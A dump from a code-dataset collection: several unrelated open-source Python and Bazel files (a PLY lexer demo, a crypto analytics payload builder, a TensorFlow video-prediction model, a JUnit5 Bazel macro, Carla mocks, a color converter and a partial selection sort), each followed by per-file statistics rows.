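  return best_eval_result[metric_key] < current_eval_result[metric_key]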
| 44.398496
| 98
| 0.637934
| 1,453
| 11,810
| 4.908465
| 0.224363
| 0.070107
| 0.051038
| 0.021593
| 0.229248
| 0.161245
| 0.125631
| 0.103337
| 0.060853
| 0.060853
| 0
| 0.003598
| 0.294073
| 11,810
| 265
| 99
| 44.566038
| 0.851865
| 0.355377
| 0
| 0.100719
| 0
| 0
| 0.100838
| 0.006212
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064748
| false
| 0.007194
| 0.100719
| 0.007194
| 0.23741
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1372bb8d33de36c039935d2eac285248cdacdfb7
| 301
|
py
|
Python
|
token_train/quickdemo(1)(1).py
|
Tatsuya26/processamento_de_linguagens
|
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
|
[
"MIT"
] | null | null | null |
token_train/quickdemo(1)(1).py
|
Tatsuya26/processamento_de_linguagens
|
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
|
[
"MIT"
] | null | null | null |
token_train/quickdemo(1)(1).py
|
Tatsuya26/processamento_de_linguagens
|
e89ab8461bcf3264a79f10b7ebc2208eff271c6c
|
[
"MIT"
] | null | null | null |
import ply.lex as lex
tokens = ["NUM", "OPERADORES"]
t_NUM = r'\d+'
t_OPERADORES = r'[+*-]'
t_ignore = ' \t\n'
def t_error(t):
print("Error")
print(t)
t.lexer.skip(1)  # skip the offending character so lexing can continue
lexer = lex.lex()
# 1+2 1-2 1*2
# ola mundo  (hello world)
import sys
for line in sys.stdin:
lexer.input(line)
for tok in lexer:
print(tok)
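# Offline sanity check (illustrative, separate from the stdin driver above):
# lexer.input("1+2") followed by iterating the lexer yields three tokens,
# NUM('1'), OPERADORES('+'), NUM('2') -- values stay strings because t_NUM
# has no conversion function.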
| 13.086957
| 28
| 0.584718
| 52
| 301
| 3.307692
| 0.519231
| 0.034884
| 0.034884
| 0.046512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025974
| 0.232558
| 301
| 23
| 29
| 13.086957
| 0.718615
| 0.069767
| 0
| 0
| 0
| 0
| 0.115108
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.214286
| 0.214286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137402a725b61eaf0c95cb37df89ef2b691ce663
| 2,015
|
py
|
Python
|
src/ctc/protocols/fei_utils/analytics/payload_crud.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/protocols/fei_utils/analytics/payload_crud.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/protocols/fei_utils/analytics/payload_crud.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from __future__ import annotations
import typing
from ctc import spec
from . import timestamp_crud
from . import metric_crud
from . import analytics_spec
async def async_create_payload(
*,
blocks: typing.Sequence[spec.BlockNumberReference] | None = None,
timestamps: typing.Sequence[int] | None = None,
timescale: analytics_spec.TimescaleSpec | None = None,
end_time: analytics_spec.Timestamp | None = None,
window_size: str | None = None,
interval_size: str | None = None,
provider: spec.ProviderSpec = None,
) -> analytics_spec.AnalyticsPayload:
"""create data payload from scratch"""
time_data = await timestamp_crud.async_get_time_data(
blocks=blocks,
timestamps=timestamps,
timescale=timescale,
end_time=end_time,
window_size=window_size,
interval_size=interval_size,
provider=provider,
)
# get data
data = await metric_crud.async_get_metrics(
blocks=time_data['block_numbers']
)
return {
'version': '0.1.0',
#
# time data
'n_samples': time_data['n_samples'],
'window_size': time_data['window_size'],
'interval_size': time_data['interval_size'],
'timestamps': time_data['timestamps'],
'block_numbers': time_data['block_numbers'],
'created_at_timestamp': time_data['created_at_timestamp'],
#
# metric data
'data': data,
}
# def update_payload(
# timescale: analytics_spec.Timescale,
# old_payload: analytics_spec.AnalyticsPayload,
# ) -> analytics_spec.AnalyticsPayload:
# new_timestamps = get_new_timestamps(
# timescale=timescale,
# old_payload=old_payload,
# )
# new_blocks = get_new_blocks(
# new_timestamps=new_timestamps,
# old_payload=old_payload,
# )
# new_metrics = get_metrics(blocks=new_blocks)
# return combine_new_data(
# old_payload=old_payload,
# new_metrics=new_metrics,
# )
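# Minimal usage sketch (block numbers are placeholders, not real data):
#
# import asyncio
#
# payload = asyncio.run(async_create_payload(blocks=[14000000, 14000100]))
# print(payload['n_samples'], payload['block_numbers'])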
| 27.22973
| 69
| 0.658065
| 223
| 2,015
| 5.609865
| 0.2287
| 0.063949
| 0.069544
| 0.047962
| 0.066347
| 0.047962
| 0
| 0
| 0
| 0
| 0
| 0.001965
| 0.242184
| 2,015
| 73
| 70
| 27.60274
| 0.817289
| 0.272457
| 0
| 0
| 0
| 0
| 0.128917
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.157895
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1374addc1e8f402af9273db13845fe70ea5229f1
| 18,118
|
py
|
Python
|
research/video_prediction/prediction_model.py
|
mbz/models
|
98dcd8dbcb1027e4b22f79113018df30da4b8590
|
[
"Apache-2.0"
] | 1
|
2021-10-05T13:34:44.000Z
|
2021-10-05T13:34:44.000Z
|
research/video_prediction/prediction_model.py
|
mbz/models
|
98dcd8dbcb1027e4b22f79113018df30da4b8590
|
[
"Apache-2.0"
] | null | null | null |
research/video_prediction/prediction_model.py
|
mbz/models
|
98dcd8dbcb1027e4b22f79113018df30da4b8590
|
[
"Apache-2.0"
] | 1
|
2020-11-14T04:15:00.000Z
|
2020-11-14T04:15:00.000Z
|
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model architecture for predictive model, including CDNA, DNA, and STP."""
import numpy as np
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.platform import flags
from tensorflow.contrib.layers.python import layers as tf_layers
from lstm_ops import basic_conv_lstm_cell
FLAGS = flags.FLAGS
# Amount to use when lower bounding tensors
RELU_SHIFT = 1e-12
# kernel size for DNA and CDNA.
DNA_KERN_SIZE = 5
def kl_divergence(mu, log_sigma):
"""KL divergence of diagonal gaussian N(mu,exp(log_sigma)) and N(0,1).
Args:
mu: mu parameter of the distribution.
log_sigma: log(sigma) parameter of the distribution.
Returns:
the KL loss.
"""
return -.5 * tf.reduce_sum(1. + log_sigma - tf.square(mu) - tf.exp(log_sigma),
axis=1)
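# This is the closed form KL(N(mu, exp(log_sigma)) || N(0, 1)) summed over the
# latent dimensions: 0.5 * sum(mu^2 + exp(log_sigma) - log_sigma - 1), written
# above with the sign pulled outside the reduce_sum.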
def construct_latent_tower(images):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
Returns:
latent_mean: predicted latent mean
latent_std: predicted latent standard deviation
latent_loss: loss of the latent tower
samples: random samples drawn from a standard Gaussian
"""
with slim.arg_scope([slim.conv2d], reuse=False):
stacked_images = tf.concat(images, 3)
latent_enc1 = slim.conv2d(
stacked_images,
32, [3, 3],
stride=2,
scope='latent_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm1'})
latent_enc2 = slim.conv2d(
latent_enc1,
64, [3, 3],
stride=2,
scope='latent_conv2',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm2'})
latent_enc3 = slim.conv2d(
latent_enc2,
64, [3, 3],
stride=1,
scope='latent_conv3',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm3'})
latent_mean = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
activation_fn=None,
scope='latent_mean',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_norm_mean'})
latent_std = slim.conv2d(
latent_enc3,
FLAGS.latent_channels, [3, 3],
stride=2,
scope='latent_std',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'latent_std_norm'})
latent_std += FLAGS.latent_std_min
divergence = kl_divergence(latent_mean, latent_std)
latent_loss = tf.reduce_mean(divergence)
if FLAGS.multi_latent:
# timestep x batch_size x latent_size
samples = tf.random_normal(
[FLAGS.sequence_length-1] + latent_mean.shape, 0, 1,
dtype=tf.float32)
else:
# batch_size x latent_size
samples = tf.random_normal(latent_mean.shape, 0, 1, dtype=tf.float32)
if FLAGS.inference_time:
# No latent tower at inference time, just standard gaussian.
return None, None, None, samples
else:
return latent_mean, latent_std, latent_loss, samples
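# Note on conventions: latent_std is consumed as a log-variance. The main tower
# reparameterizes z = latent_mean + exp(latent_std / 2) * eps with eps ~ N(0, 1),
# which matches kl_divergence treating its second argument as log_sigma.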
def construct_model(images,
actions=None,
states=None,
iter_num=-1.0,
k=-1,
use_state=True,
num_masks=10,
stp=False,
cdna=True,
dna=False,
context_frames=2):
"""Build convolutional lstm video predictor using STP, CDNA, or DNA.
Args:
images: tensor of ground truth image sequences
actions: tensor of action sequences
states: tensor of ground truth state sequences
iter_num: tensor of the current training iteration (for sched. sampling)
k: constant used for scheduled sampling. -1 to feed in own prediction.
use_state: True to include state and action in prediction
num_masks: the number of different pixel motion predictions (and
the number of masks for each of those predictions)
stp: True to use Spatial Transformer Predictor (STP)
cdna: True to use Convolutional Dynamic Neural Advection (CDNA)
dna: True to use Dynamic Neural Advection (DNA)
context_frames: number of ground truth frames to pass in before
feeding in own predictions
Returns:
gen_images: predicted future image frames
gen_states: predicted future states
Raises:
ValueError: if more than one network option specified or more than 1 mask
specified for DNA model.
"""
# Each image is being used twice, in latent tower and main tower.
# This is to make sure we are using the *same* image for both, ...
# ... given how TF queues work.
images = [tf.identity(image) for image in images]
if stp + cdna + dna != 1:
raise ValueError('More than one, or no network option specified.')
batch_size, img_height, img_width, color_channels = images[0].get_shape()[0:4]
lstm_func = basic_conv_lstm_cell
# Generated robot states and images.
gen_states, gen_images = [], []
current_state = states[0]
if k == -1:
feedself = True
else:
# Scheduled sampling:
# Calculate number of ground-truth frames to pass in.
num_ground_truth = tf.to_int32(
tf.round(tf.to_float(batch_size) * (k / (k + tf.exp(iter_num / k)))))
feedself = False
# LSTM state sizes and states.
lstm_size = np.int32(np.array([32, 32, 64, 64, 128, 64, 32]))
lstm_state1, lstm_state2, lstm_state3, lstm_state4 = None, None, None, None
lstm_state5, lstm_state6, lstm_state7 = None, None, None
# Latent tower
latent_loss = 0.0
if FLAGS.stochastic_model:
latent_tower_outputs = construct_latent_tower(images)
latent_mean, latent_std, latent_loss, samples = latent_tower_outputs
# Main tower
for image, action in zip(images[:-1], actions[:-1]):
# Reuse variables after the first timestep.
reuse = bool(gen_images)
done_warm_start = len(gen_images) > context_frames - 1
with slim.arg_scope(
[lstm_func, slim.layers.conv2d, slim.layers.fully_connected,
tf_layers.layer_norm, slim.layers.conv2d_transpose],
reuse=reuse):
if feedself and done_warm_start:
# Feed in generated image.
prev_image = gen_images[-1]
elif done_warm_start:
# Scheduled sampling
prev_image = scheduled_sample(image, gen_images[-1], batch_size,
num_ground_truth)
else:
# Always feed in ground_truth
prev_image = image
# Predicted state is always fed back in
state_action = tf.concat(axis=1, values=[action, current_state])
enc0 = slim.layers.conv2d(
prev_image,
32, [5, 5],
stride=2,
scope='scale1_conv1',
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm1'})
hidden1, lstm_state1 = lstm_func(
enc0, lstm_state1, lstm_size[0], scope='state1')
hidden1 = tf_layers.layer_norm(hidden1, scope='layer_norm2')
hidden2, lstm_state2 = lstm_func(
hidden1, lstm_state2, lstm_size[1], scope='state2')
hidden2 = tf_layers.layer_norm(hidden2, scope='layer_norm3')
enc1 = slim.layers.conv2d(
hidden2, hidden2.get_shape()[3], [3, 3], stride=2, scope='conv2')
hidden3, lstm_state3 = lstm_func(
enc1, lstm_state3, lstm_size[2], scope='state3')
hidden3 = tf_layers.layer_norm(hidden3, scope='layer_norm4')
hidden4, lstm_state4 = lstm_func(
hidden3, lstm_state4, lstm_size[3], scope='state4')
hidden4 = tf_layers.layer_norm(hidden4, scope='layer_norm5')
enc2 = slim.layers.conv2d(
hidden4, hidden4.get_shape()[3], [3, 3], stride=2, scope='conv3')
# Pass in state and action.
smear = tf.reshape(
state_action,
[int(batch_size), 1, 1, int(state_action.get_shape()[1])])
smear = tf.tile(
smear, [1, int(enc2.get_shape()[1]), int(enc2.get_shape()[2]), 1])
if use_state:
enc2 = tf.concat(axis=3, values=[enc2, smear])
# Setup latent
if FLAGS.stochastic_model:
latent = samples
if FLAGS.multi_latent:
latent = samples[timestep]
if not FLAGS.inference_time:
latent = tf.cond(iter_num < FLAGS.num_iterations_1st_stage,
lambda: tf.identity(latent),
lambda: latent_mean + tf.exp(latent_std / 2.0) * latent)
with tf.control_dependencies([latent]):
enc2 = tf.concat([enc2, latent], 3)
enc3 = slim.layers.conv2d(
enc2, hidden4.get_shape()[3], [1, 1], stride=1, scope='conv4')
hidden5, lstm_state5 = lstm_func(
enc3, lstm_state5, lstm_size[4], scope='state5') # last 8x8
hidden5 = tf_layers.layer_norm(hidden5, scope='layer_norm6')
enc4 = slim.layers.conv2d_transpose(
hidden5, hidden5.get_shape()[3], 3, stride=2, scope='convt1')
hidden6, lstm_state6 = lstm_func(
enc4, lstm_state6, lstm_size[5], scope='state6') # 16x16
hidden6 = tf_layers.layer_norm(hidden6, scope='layer_norm7')
# Skip connection.
hidden6 = tf.concat(axis=3, values=[hidden6, enc1]) # both 16x16
enc5 = slim.layers.conv2d_transpose(
hidden6, hidden6.get_shape()[3], 3, stride=2, scope='convt2')
hidden7, lstm_state7 = lstm_func(
enc5, lstm_state7, lstm_size[6], scope='state7') # 32x32
hidden7 = tf_layers.layer_norm(hidden7, scope='layer_norm8')
# Skip connection.
hidden7 = tf.concat(axis=3, values=[hidden7, enc0]) # both 32x32
enc6 = slim.layers.conv2d_transpose(
hidden7,
hidden7.get_shape()[3], 3, stride=2, scope='convt3', activation_fn=None,
normalizer_fn=tf_layers.layer_norm,
normalizer_params={'scope': 'layer_norm9'})
if dna:
# Using largest hidden state for predicting untied conv kernels.
enc7 = slim.layers.conv2d_transpose(
enc6, DNA_KERN_SIZE**2, 1, stride=1, scope='convt4', activation_fn=None)
else:
# Using largest hidden state for predicting a new image layer.
enc7 = slim.layers.conv2d_transpose(
enc6, color_channels, 1, stride=1, scope='convt4', activation_fn=None)
# This allows the network to also generate one image from scratch,
# which is useful when regions of the image become unoccluded.
transformed = [tf.nn.sigmoid(enc7)]
if stp:
stp_input0 = tf.reshape(hidden5, [int(batch_size), -1])
stp_input1 = slim.layers.fully_connected(
stp_input0, 100, scope='fc_stp')
transformed += stp_transformation(prev_image, stp_input1, num_masks)
elif cdna:
cdna_input = tf.reshape(hidden5, [int(batch_size), -1])
transformed += cdna_transformation(prev_image, cdna_input, num_masks,
int(color_channels))
elif dna:
# Only one mask is supported (more should be unnecessary).
if num_masks != 1:
raise ValueError('Only one mask is supported for DNA model.')
transformed = [dna_transformation(prev_image, enc7)]
masks = slim.layers.conv2d_transpose(
enc6, num_masks + 1, 1, stride=1, scope='convt7', activation_fn=None)
masks = tf.reshape(
tf.nn.softmax(tf.reshape(masks, [-1, num_masks + 1])),
[int(batch_size), int(img_height), int(img_width), num_masks + 1])
mask_list = tf.split(axis=3, num_or_size_splits=num_masks + 1, value=masks)
output = mask_list[0] * prev_image
for layer, mask in zip(transformed, mask_list[1:]):
output += layer * mask
gen_images.append(output)
current_state = slim.layers.fully_connected(
state_action,
int(current_state.get_shape()[1]),
scope='state_pred',
activation_fn=None)
gen_states.append(current_state)
return gen_images, gen_states, latent_loss
## Utility functions
def stp_transformation(prev_image, stp_input, num_masks):
"""Apply spatial transformer predictor (STP) to previous image.
Args:
prev_image: previous image to be transformed.
stp_input: hidden layer to be used for computing STN parameters.
num_masks: number of masks and hence the number of STP transformations.
Returns:
List of images transformed by the predicted STP parameters.
"""
# Only import spatial transformer if needed.
from spatial_transformer import transformer
identity_params = tf.convert_to_tensor(
np.array([1.0, 0.0, 0.0, 0.0, 1.0, 0.0], np.float32))
transformed = []
for i in range(num_masks - 1):
params = slim.layers.fully_connected(
stp_input, 6, scope='stp_params' + str(i),
activation_fn=None) + identity_params
transformed.append(transformer(prev_image, params))
return transformed
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
cdna_input: hidden layer to be used for computing CDNA kernels.
num_masks: the number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = int(cdna_input.get_shape()[0])
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = slim.layers.fully_connected(
cdna_input,
DNA_KERN_SIZE * DNA_KERN_SIZE * num_masks,
scope='cdna_params',
activation_fn=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, DNA_KERN_SIZE, DNA_KERN_SIZE, 1, num_masks])
cdna_kerns = tf.nn.relu(cdna_kerns - RELU_SHIFT) + RELU_SHIFT
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(cdna_kerns, [DNA_KERN_SIZE, DNA_KERN_SIZE, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(prev_image, cdna_kerns, [1, 1, 1, 1], 'SAME')
# Transpose the dimensions to where they belong.
transformed = tf.reshape(transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def dna_transformation(prev_image, dna_input):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
dna_input: hidden layer to be used for computing the DNA transformation.
Returns:
Image transformed by the predicted DNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(DNA_KERN_SIZE):
for ykern in range(DNA_KERN_SIZE):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - RELU_SHIFT) + RELU_SHIFT
kernel = tf.expand_dims(
kernel / tf.reduce_sum(
kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def scheduled_sample(ground_truth_x, generated_x, batch_size, num_ground_truth):
"""Sample batch with specified mix of ground truth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
num_ground_truth: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
idx = tf.random_shuffle(tf.range(int(batch_size)))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, int(batch_size)))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
return tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
| 37.903766
| 95
| 0.669886
| 2,488
| 18,118
| 4.691318
| 0.181672
| 0.023561
| 0.016707
| 0.021847
| 0.239291
| 0.18977
| 0.160212
| 0.134339
| 0.083105
| 0.070082
| 0
| 0.028182
| 0.230323
| 18,118
| 477
| 96
| 37.983229
| 0.80882
| 0.312341
| 0
| 0.131086
| 0
| 0
| 0.040223
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026217
| false
| 0
| 0.026217
| 0
| 0.082397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137575ac656962b0f9d67245530a471421c965ac
| 1,657
|
bzl
|
Python
|
junit5/rules.bzl
|
prashantsharma04/bazel_java_rules
|
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
|
[
"Apache-2.0"
] | 1
|
2020-10-22T06:44:10.000Z
|
2020-10-22T06:44:10.000Z
|
junit5/rules.bzl
|
prashantsharma04/bazel_java_rules
|
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
|
[
"Apache-2.0"
] | 5
|
2020-06-01T22:33:59.000Z
|
2020-11-01T17:03:06.000Z
|
junit5/rules.bzl
|
prashantsharma04/bazel_java_rules
|
4f80fbe70e1778aa8e3e0ee8aa2f1efc3e44a462
|
[
"Apache-2.0"
] | 1
|
2020-08-17T07:42:21.000Z
|
2020-08-17T07:42:21.000Z
|
load("@rules_jvm_external//:defs.bzl", "artifact")
# For more information see
# - https://github.com/bmuschko/bazel-examples/blob/master/java/junit5-test/BUILD
# - https://github.com/salesforce/bazel-maven-proxy/tree/master/tools/junit5
# - https://github.com/junit-team/junit5-samples/tree/master/junit5-jupiter-starter-bazel
def junit5_test(name, srcs, test_package, resources = [], deps = [], runtime_deps = [], **kwargs):
"""JUnit runner macro"""
FILTER_KWARGS = [
"main_class",
"use_testrunner",
"args",
]
for arg in FILTER_KWARGS:
if arg in kwargs.keys():
kwargs.pop(arg)
junit_console_args = []
if test_package:
junit_console_args += ["--select-package", test_package]
else:
fail("must specify 'test_package'")
native.java_test(
name = name,
srcs = srcs,
use_testrunner = False,
main_class = "org.junit.platform.console.ConsoleLauncher",
args = junit_console_args,
deps = deps + [
artifact("org.junit.jupiter:junit-jupiter-api"),
artifact("org.junit.jupiter:junit-jupiter-params"),
artifact("org.junit.jupiter:junit-jupiter-engine"),
artifact("org.hamcrest:hamcrest-library"),
artifact("org.hamcrest:hamcrest-core"),
artifact("org.hamcrest:hamcrest"),
artifact("org.mockito:mockito-core"),
],
visibility = ["//java:__subpackages__"],
resources = resources,
runtime_deps = runtime_deps + [
artifact("org.junit.platform:junit-platform-console"),
],
**kwargs
)
| 35.255319
| 98
| 0.616174
| 181
| 1,657
| 5.491713
| 0.40884
| 0.088531
| 0.064386
| 0.069417
| 0.105634
| 0.105634
| 0
| 0
| 0
| 0
| 0
| 0.003971
| 0.240193
| 1,657
| 46
| 99
| 36.021739
| 0.785544
| 0.173205
| 0
| 0.054054
| 0
| 0
| 0.31227
| 0.254225
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1376113ee039ab051c772dba764cfe52a310f45d
| 625
|
py
|
Python
|
tests/mocked_carla.py
|
fangedward/pylot
|
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
|
[
"Apache-2.0"
] | null | null | null |
tests/mocked_carla.py
|
fangedward/pylot
|
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
|
[
"Apache-2.0"
] | null | null | null |
tests/mocked_carla.py
|
fangedward/pylot
|
a742b3789ee8e7fa2d692ae22bda1e2960ed9345
|
[
"Apache-2.0"
] | null | null | null |
# This module provides mocked versions of classes and functions provided
# by Carla in our runtime environment.
class Location(object):
""" A mock class for carla.Location. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
class Rotation(object):
""" A mock class for carla.Rotation. """
def __init__(self, pitch, yaw, roll):
self.pitch = pitch
self.yaw = yaw
self.roll = roll
class Vector3D(object):
""" A mock class for carla.Vector3D. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
| 20.833333
| 72
| 0.5776
| 88
| 625
| 3.965909
| 0.375
| 0.057307
| 0.094556
| 0.137536
| 0.389685
| 0.389685
| 0.183381
| 0.183381
| 0.183381
| 0.183381
| 0
| 0.004619
| 0.3072
| 625
| 29
| 73
| 21.551724
| 0.801386
| 0.336
| 0
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1377e6c9502e17891e25610fab3c369d6bcdf674
| 404
|
py
|
Python
|
rgb_to_cmyk.py
|
Zweizack/fuzzy-rainbow
|
f69f7eb59971d28a9093a03c1911b41e23cddf2a
|
[
"MIT"
] | null | null | null |
rgb_to_cmyk.py
|
Zweizack/fuzzy-rainbow
|
f69f7eb59971d28a9093a03c1911b41e23cddf2a
|
[
"MIT"
] | null | null | null |
rgb_to_cmyk.py
|
Zweizack/fuzzy-rainbow
|
f69f7eb59971d28a9093a03c1911b41e23cddf2a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
ee = '\033[1m'
green = '\033[32m'
yellow = '\033[33m'
cyan = '\033[36m'
line = cyan+'-' * 0x2D
print(ee+line)
R,G,B = [float(X) / 0xFF for X in input(f'{yellow}RGB: {green}').split()]
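# Standard RGB -> CMYK conversion on the normalized channels read above:
#   K = 1 - max(R, G, B)
#   C = (1 - R - K) / (1 - K),  with M and Y computed analogously from G and B
# The 0x64 factor below simply scales the 0..1 results to percentages.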
K = 1-max(R,G,B)
C,M,Y = [round(float((1-X-K)/(1-K) * 0x64),1) for X in [R,G,B]]
K = round(K * 0x64,1)
print(f'{yellow}CMYK: {green}{C}%, {M}%, {Y}%, {K}%')
print(line)
| 21.263158
| 73
| 0.542079
| 80
| 404
| 2.7375
| 0.5
| 0.027397
| 0.041096
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102339
| 0.153465
| 404
| 18
| 74
| 22.444444
| 0.538012
| 0.106436
| 0
| 0
| 0
| 0
| 0.264624
| 0
| 0
| 0
| 0.044568
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13783bd8e2a248d44492c03b9013e0d6c16cfd22
| 478
|
py
|
Python
|
sort/selectionsort.py
|
vitormrts/sorting-algorithms
|
5571ce522a7fd33f976fa05b264ed2c253c221b3
|
[
"MIT"
] | null | null | null |
sort/selectionsort.py
|
vitormrts/sorting-algorithms
|
5571ce522a7fd33f976fa05b264ed2c253c221b3
|
[
"MIT"
] | null | null | null |
sort/selectionsort.py
|
vitormrts/sorting-algorithms
|
5571ce522a7fd33f976fa05b264ed2c253c221b3
|
[
"MIT"
] | null | null | null |
def selection_sort(A): # O(n^2)
n = len(A)
for i in range(n-1): # walk over the list
min_idx = i
